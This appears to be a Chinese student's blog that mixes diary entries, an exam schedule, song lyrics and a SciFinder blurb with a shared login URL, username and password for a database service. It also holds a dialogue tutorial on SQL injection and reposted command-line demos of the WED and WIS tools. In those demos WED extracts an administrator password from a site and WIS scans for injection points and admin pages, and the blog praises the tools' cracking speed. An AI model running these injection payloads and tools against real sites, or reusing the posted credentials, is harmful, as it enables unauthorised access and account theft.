天堂隔壁

研究生生活：

学习：除了考前不需要去教室上自习~~~~  大家都到那   里去了呢，有去实验室的，有陪女朋友的····

生活：本部体育设施比分部差的远了，难得去锻炼锻炼，除了刚开学的那场研究生比赛的话，几乎这个学期都没什么运动的

工作：实验室也没有要求要去，就偷的半天的工夫～～～偶尔去实验室听听讲座什么的，国的也清闲～～

不过大多数人都是在上网了吧，有的忙文献检索呢，破解；有的忙着看在线电影，看韩剧，也有的忙着一些英语考试，总的来说，大家呆在电脑前面的时间应该是最长的了～～～～～

＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝

昨天下午, 我们班97级的校友在美国的两个校友回国了

给我们讲了讲他们在美国的经历以及申请的注意事项

两个都是现在http://www.duq.edu/上的,

有一个就是学药剂出去的,还是全奖呢.

据说这个学校都我们学校的学生很有好感啊

到时候可以试试啊  呵呵

不过现在还是要好好准备作文呢

加油啊!!

Scifinder的简介了:

SciFinder, a research tool that allows you to access the world's largest collection of biochemical, chemical, chemical engineering, medical, and other related information. You can explore one single source for scientific information in journals and patent literature from around the world.

With SciFinder, you can: Explore nearly a century of research Explore by chemical structure or biological sequence Explore by research topic, author, company, substance name, or reaction Stay up to date on today's most recent scientific developments

With SciFinder, you can be more creative and productive in your research process. SciFinder is easy-to-use and offers you:

• Access to current, high quality scientific information
• Links to more relevant journal articles and patent documents than any other source
• The ability to significantly improve your productivity
• Capabilities for exploring substructures and reactions
  

Use SciFinder to explore chemical and biological information from around the world!

-----------------------------------------------------------------------

感谢yxzxs兄 和 山无陵好友!!

一个好的光盘阅览室密码
http://218.1.68.113/citrix/nfuse17/login.asp
账号：qw16ph28
密码：MJ333
内容：BP；EP；Pharmaceutical Excipients；USP；通用药物制剂研制手册；Brands；Chemecal Business NewsBase ；Combined Chemical Dictionary；Directory of World Chemical Producers ；Ensemble；InfoChem （ChemReact41 PC-Search）；Inpharma；International Pharmaceutical；Abs……

Novast单位今天来学校招聘

公司刚刚起步, 不过是第一个把研发部门搬到国内来的. 这一点很不错

CEO张国华原是药大校友,导师刘国杰. 在国外担任两个大药厂研发部门的主管,副总裁.

现在回国在南通建立联亚药业,目的在于把中国的成品药出口美国. 并解决中试放大重视不够的问题!!

单位初期多从药剂研究开始,后来会逐步引入药物合成.然后发展一个全面的药物研发.

呵呵

12月22上午                    药动学与药效学

12月25上午                     科学选论

12月26下午2点               C语言程序设计

1月1日晚                         生物数学模型

1月4上午                        物理药剂学

1月10上午                      生物药学

1月12下午                        英语

------------------------------------------------------------------------

这学期可能不回家了, 要在学校准备考试, 努力啊!!!

星星点灯

抬头的一片天是男儿的一片天
曾经在满天的星光下做梦的少年
不知道天多高不知道海多远
却发誓要带着你远走到海角天边
不负责任的誓言年少轻狂的我
在黑暗中迷失才发现自己的脆弱
看着你哭红的眼镜想着远离的家门
满天的星星请为我点盏希望的灯火

星星点灯照亮我的家门
让迷失的孩子找到来时的路
星星点灯照亮我的前程
用一点光温暖孩子的心
(music)
现在的一片天是肮脏的一片天
星星在文明的天空里再也看不见
天其实并不高海其实也不远
人心其实比天高比海更遥远
学会骗人的谎言追逐名利的我
在现实中迷失才发现自己的脆弱
看着你含泪的离去想着茫茫的前程
远方的星星请为我点盏希望的灯火

星星点灯照亮我的家门
让迷失的孩子找到来时的路
星星点灯照亮我的前程
用一点光温暖孩子的心

多年以后一场大雨惊醒沉睡的我
突然之间都市的霓虹都不再闪烁
天边有颗模糊的星光偷偷探出了头
是你的眼神依旧在远方为我在守候
星星点灯照亮我的家门
让迷失的孩子找到来时的路
星星点灯照亮我的前程
用一点光温暖孩子的心

---

这是SQL注射原理的讲解。

通过暴库，下载数据库，阿剑剑对数据库也有了些感性的认识。可是，并不是所有时候我们都可以得到别人的数据库并打开来看的。听说有门技术叫SQL注射，不用下载数据库，也可以得到数据库中的信息。于是阿剑剑嚷嚷着要学它。
欠钱：“SQL注射是一门比较有难度的技术，因为要了解它和熟练它需要有ASP和数据库的基础。你认为自己有资格学习它吗？”
阿剑剑想了一下：“这些基础我是一点都没有啊，可是不是听说市面上有很多SQL注射的傻瓜工具吗？你教会我使用这些工具不就可以了？”
欠钱：“既然如此，那好吧，我首先把SQL最基本的语法告诉你，这样你才好理解那些SQL注射工具上的术语和使用步骤。”
阿剑剑：“欠钱你真是太好了，感动ing！不过，不会很难吧？”
“当然不难了！”欠钱拍着胸脯。
一个数据库一般都包含有若干张表，如同我们前面暴出的数据库中admin表包含有管理员信息，而user表则包含有所有的论坛用户信息一样。以下面这张表为例：
Dv_User
UserID UserName UserPassword UserEmail UserPost
1 admin 469e80d32c0559f8 eway@aspsky.net 0
2 Test 965eb72c92a549dd 1@2.com 0

这是DVBBS 7.0的数据库中所有用户资料的表，Dv_User 是表名。每一行代表一个用户，每一列是该用户的某种属性。我们最感兴趣的自然是用户名与密码这样的属性了。
SQL是一种用于操作数据库的规范化语言，不同的数据库（MSSQL、MYSQL、ORACLE……）大体上都是一样的。比如我们要查询数据库中的信息：
select UserName,UserPassword from Dv_User where UserID=1;
这就是一个最典型的SQL查询语句，它的意思是，在Dv_User这张表中，将UserID为1的用户名与密码查询出来。
得到的结果是：admin 469e80d32c0559f8
SELECT语句语法：
SELECT [列名]，[列名2]…… FROM [表名] WHERE [限制条件]
例：
SELECT * FROM Dv_User where UserID=1
表示查询UserID为1的所有信息。
更新：
UPDATE [表名] SET [列名]=新值 WHERE [限制条件]
例：
UPDATE Dv_User set [UserPassword]=’ 965eb72c92a549dd’ WHERE UserName=’admin’
此语句将把Dv_User表中的UserName为admin的那一行中UserPassword的值改为965eb72c92a549dd。
删除：
DELETE FROM [表名] WHERE [限制条件]
例：
DELETE FROM Dv_User WHERE UserName=’test’
将用户名为test的那一行从Dv_User表中删除

二、SQL注射漏洞简述
阿剑剑仔细把上面四个SQL语句读了几遍，发现非常的容易，于是虚心请教欠钱：“SQL语法看起来很容易上手嘛，那SQL漏洞是怎么来的呢？”
欠钱打开一个页面，指着里面的代码：
if id<>"" then
sql="SELECT * FROM [日记] WHERE id="&id
rs.Open sql,Conn,1
阿剑剑看了一眼：“哎呀，头晕了！”
欠钱敲了他一下：“关于漏洞的成因我只讲这一次，如果怕难就不知道漏洞的由来了，而且实际上一点也不难的，看好了，我们这段代码是提取自BBSXP论坛的，经过我改动以后，把它做成了一个有漏洞的页面给你讲述SQL漏洞的原理。”
那张日记的表内容如下：
日记
id username title content adddate
1 职业欠钱 今天安装了BBSXP 这是5.16版,发现BBSXP体积虽小,可是功能一点也不少.完全够用，不知道安全性怎么样 2005-10-25
2 职业欠钱 再写一个日志吧 多写几个日志看看,玩玩,呵呵,反正这个论坛也只有我一个人在.. 555555555好寂寞 2005-10-25
我们访问
http://localhost/bbsxp/blog.asp?id=1
的时候结果如图1。

阿剑剑：“我明白了，访问blog.asp的时候，我们提交的参数id为1，那么放到SQL语句里就变成了：
SELECT * FROM [日记] WHERE id=1
所以就得到我们看到的那个页面，对吗？”
欠钱：“很好！正是如此！SQL漏洞的起源就从这里开始了！注意到了吗？id的值是由我们提交的，但是它却没有做任何的检查，也就是我们提交的id可以是任意字符串。假设我们提交一个单引号的话，SQL语句就会因为id=1’ 而出错”
“等等，为什么加单引号会出错呢？”
“因为单引号在SQL语句里有特殊的含义，它只能以’abc’这样的方式出现，表示abc为一个字符串，如果只出现一个单引号，整个句子肯定会出错了。”
“哦，那单引号和SQL注射有什么关系呢？”
“关系很密切，一般来说，常见的SQL语句有这么几种：
SELECT * FROM [表] WHERE id=12 这是数字型，12由我们提交
SELECT * FROM [表] WHERE name=’admin’ 这是字符型，admin由我们提交
SELECT * FROM [表] WHERE key like ‘%word%’ 这是搜索型，word由我们提交
我们以第一种情况为例，假设我们提交 id=12 and 1=1，那么完整的SQL语句为：
SELECT * FROM [表] WHERE id=12 and 1=1
它并不出错，但是如果我们提交改为1=2，也就是
SELECT * FROM [表] WHERE id=12 and 1=2
此时注意到WHERE后面的条件，它要求存在一条记录，必须满足id=12，同时还要求1=2，由于1=2永远不成立，于是这个SQL语句尽管语法上没错误，可是搜索的结果却一定为空。于是将提示我们找不到记录。如图2。”

阿剑剑想了一下：“这么说，为了不让SQL语句出错，那么我们在字符型SQL语句中，要提交的变量就应该是
admin’ and ‘1’=’1
然后补到完整的SQL语句中，就是
SELECT * FROM [表] WHERE name=’admin’ and ‘1’=’1’
而字符型则是
word%’ and ‘%’=’
补充到完整的SQL语句为：
SELECT * FROM [表] WHERE key like ‘%word%’ and ‘%’=’%’
”
欠钱：“完全正确！这正是我们判断注射类型的方法！”
阿剑剑：“那我们怎么才能够得到数据库中的信息呢？”
欠钱：“最直接的方法自然是猜了，我们在提交的数据里加入一些其他的判断语句来代替and 1=1这样的条件。以数字型SQL查询语句为例，我们提交一个id的值如下：
id=1 and exists (select * from admin)
还原到完整的SQL语句中：
SELECT * FROM [表] WHERE id=1 and exists (select * from admin)
如果存在admin这张表的话，那么这个SQL语句将按原样返回，否则将返回空值。到blog.asp中去实验一下就知道了。如图3。”

阿剑剑：“提示不存在这张表，然后我就要再学习很多的SQL语句去猜测接下来的数据吗？”
欠钱：“呵呵，确实更改这个SQL语句我们就可以慢慢猜出数据库里的内容。首先猜一个数据库里有哪些表，然后逐个猜解这些表中有哪些列（以后称为字段），最后猜解个表中的具体内容。记住这个流程后，我们不打算深入下去了，因为我们已经有非常多的注射辅助工具了，这些工具会帮我们完成这些工作。”
“嗯，也好，至少我大致上知道了SQL注射是怎么样一个漏洞，具体的东西要靠我以后自学ASP和数据库才能提高吧，现在你就教我用那些工具吧，我已经迫不及待了！”

昨天下午考完了一门

讨厌的政治, 虽然是开卷考试

超那些答案也超的手都疼了

晚上出去好好吃了一顿!!!

  

[WED] 2004/08/29

WED (Web Entry Detector)，针对存在SQL Injection的网站对管理帐号进行扫描。

Dem 对通过WIS扫描出的存在SQL Injection漏洞的网站进行后台管理帐号扫描

C:\\>WED.exe http://www.someaspsite.com/shownews.asp?newsid=1544

Web Entry Detector, Ver 1.0 by netXeyes, 2004/08/26
http://www.netXeyes.com, security@vip.sina.com

#### Phrase 0: Check Enviroment ####
Get Row 1, Set Sensitive 250, Max Threads is 30
File C:\\TableName.dic Opened
File C:\\UserField.dic Opened
File C:\\PassField.dic Opened

#### Phrase 1: Process Argv ####
Host:www.someaspsite.com
Page:/shownews.asp?newsid=1544

#### Phrase 2: Detect SQL Injection ####
SQL Injection Detected.

#### Phrase 3: Get Cookies ####
Tag: 2017
Cookie: ASPSESSIONIDSADSBTAS=BIMAMMNCLCCIFICPLNEMFKND; path=/

#### Phrase 4: Starting Get Table Name ####
Tag: 45
Got Table Name is "users"

#### Phrase 5: Starting Get Name Field ####
Tag: 45
Got Name Field is "name"

#### Phrase 6: Starting Get Length of Field "name" ####
Tag: 24
Got Length of Field "name" is: 13

#### Phrase 7: Starting Get Password Field ####
Tag: 45
Got Password Field is "pwd"

#### Phrase 8: Starting Get Length of Field "pwd" ####
Tag: 24
Got Length of Field "pwd" is: 9

#### Phrase 9: Starting Brute Field "name" and "pwd" (Access Mode) ####

name is: administrator
pwd is: admin@bvn

C:\\>

到这一步，就可以通过WIS扫描获得的管理页面后台登陆了。

[WIS] 2004/08/29

WIS (Web Injection Scanner)，自动对整个网站进行SQL Injection 脆弱性扫描，并且能够扫描后台登陆界面。

Demo1: 扫描整个网站，找出存在SQL Injection的页面

C:\\>wis http://www.someaspsite.com/

Web Injection Scanner (Protype 0.4)
by netXeyes, 2004.05.08 http://www.netXeyes.com security@vip.sina.com
　

Scanning http://www.someaspsite.com/, Page: Unlimited
Patient, Please....

(001 + 000) Checking: /shownews.asp?newsid=204
SQL Injection Found: /shownews.asp?newsid=204Injection Page Final Result:
============================
/shownews.asp?newsid=204
C:\\>

Demo2: 扫描后台管理页面

C:\\>wis http://www.someaspsite.com/ ／A

Web Injection Scanner (Protype 0.4)
by netXeyes, 2004.05.08 http://www.netXeyes.com security@vip.sina.com

Scanning http://www.someaspsite.com/, Page: Unlimited, Detect Access Page
Patient, Please....

(004 + 005) Access Page: /www.asp
(004 + 006) Access Page: /wwwstats.asp
(004 + 006) Access Page: /wwwlog.asp
(004 + 006) Access Page: /wstats.asp
(004 + 006) Access Page: /work.asp
(005 + 007) Access Page: /webstats.asp
(000 + 016) Access Page: /gansu2/tjhg.files/admin_index.asp
(000 + 015) Access Page: /gansu2/tjhg.files/admin.asp
(000 + 012) Access Page: /gansu2/gs.files/admin_index.asp
(000 + 011) Access Page: /gansu2/gs.files/index_admin.asp
(000 + 010) Access Page: /gansu2/tjhg.files/admin_del.asp
(000 + 009) Access Page: /gansu2/ddddd.files/manage.asp
(000 + 003) Access Page: /gansu2/ddddd.files/index_admin.asp

Access Page Final Result:
============================
/gansu2/login.asp (200 OK)
Scan Finished

C:\\>

呵呵～～比翼战鹰拿一个网站测试了其中的一个ＳＱＬ密码破解工具ＷＥＤ．ＥＸＥ发现它的密码破解速度很快，准确率也很高，一点都不比ＮＢＳＩ２差！虽然是命令提示符下的工具！但操作十分的简单！最重要的它是完全免费的！

WED (WEB Entry Detector)	本地下载
WIS (WEB Injection Scanner)	本地下载